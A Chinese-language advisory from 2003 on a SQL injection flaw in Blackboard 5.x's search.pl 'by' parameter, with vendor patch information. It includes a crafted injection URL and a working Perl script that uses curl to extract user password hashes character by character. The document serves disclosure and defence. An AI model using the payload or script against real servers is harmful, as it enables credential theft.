发布日期：2003-01-21
更新日期：2003-01-25

受影响系统：

Blackboard Blackboard 5.5.1
Blackboard Blackboard 5.5
Blackboard Blackboard 5.0.2
Blackboard Blackboard 5.0

描述：

---

BUGTRAQ  ID: 6655

Blackboard是一款在线提供学术、管理、社区及其他一些教育服务的解决方案。

Blackboard对用户提交的输入请求缺少充分过滤，远程攻击者可以利用这个漏洞未授权查询Blackboard用户目录，获得任意用户MD5加密密码信息等恶意活动。

系统包含的搜索脚本'/bin/common/search.pl'对用户提交的参数缺少正确过滤，攻击者提交恶意SQL命令给'&by'参数，可导致更改原SQL逻辑，获得任意用户MD5加密密码信息或用户目录信息。利用这些信息可以进一步对系统进行攻击。

<*来源：Pedram Amini （pedram.amini@tulane.edu）
  
  链接：http://pedram.redhive.com/advisories/blackboard5.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Pedram Amini （pedram.amini@tulane.edu）提供了如下测试方法：

/bin/common/search.pl?action=RESULTS
                         &context=USERDIR
                         &type=SEARCH
                         &operation=VIEW
                         &keyword=meow
                         &keywordraw=
                         &by=passwd) LIKE '%%' AND U.system_role = 't' AND upper(U.passwd

测试脚本：

#!/usr/bin/perl -w

#
# Blackboard Password Extractor
#
# pedram amini <http://pedram.redhive.com>
#
# - refer to the advisory for usage.
# - requires curl.
# - can be easily further automated.
#

# set these:
$password   = "abcd";                   # initial "narrow down" password.
$session_id = "\@\@123456abcd....";     # current valid session id.
$host       = "blackboard.xxxxx.xxx";   # target blackboard server.
$grep_for   = "lastname";               # target we're looking for.

# don't forget to comment out either the working forwards or backwards lines.

@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
          '8', '9', 'a', 'b', 'c', 'd', 'e', 'f');

$url = "http://$host/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=MEOW&keywordraw=_SENTINAL_&by=passwd";
$url =~ s/&/\\&/g;

for ($keep_looking = 1; $keep_looking != 0; ) {
    for ($i = 0; $i <= $#chars; $i++) {
        # working forwards:
        #$cur_pass = $password . $chars[$i];

        # working backwards:
        #$cur_pass = $chars[$i] . $password;

        $cur_url  = $url;
        $cur_url  =~ s/_SENTINAL_/$cur_pass/;

        print "\n --> working  ... $chars[$i]";

        $return = `curl --cookie session_id=$session_id $cur_url 2> /dev/null | grep -i $grep_for | wc -l`;
        $return =~ s/\s//g;

        print "\n --> returned ... $return";

        if ($return) {
            print "\n --> next char found: $chars[$i]";

            # working forwards:
            #$password .= $chars[$i];
            
            # working backwards:
            #$password = $chars[$i] . $password;
            
            
            $keep_looking = 1;
            $i = $#chars;
        } else {
            $keep_looking = 0;
        }

        sleep 1;
    }
    print "\n --> current password ... $password";
}

建议：

---

厂商补丁：

Blackboard
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

Blackboard将在最近推出安全补丁来修补这个漏洞，用户可以联系供应商获得详细信息。

Blackboard产品支持热线：

1-888-788-5264

或者通过WEB站点提交服务请求：

http://company.blackboard.com/

浏览次数：3288
严重程度：28（网友投票）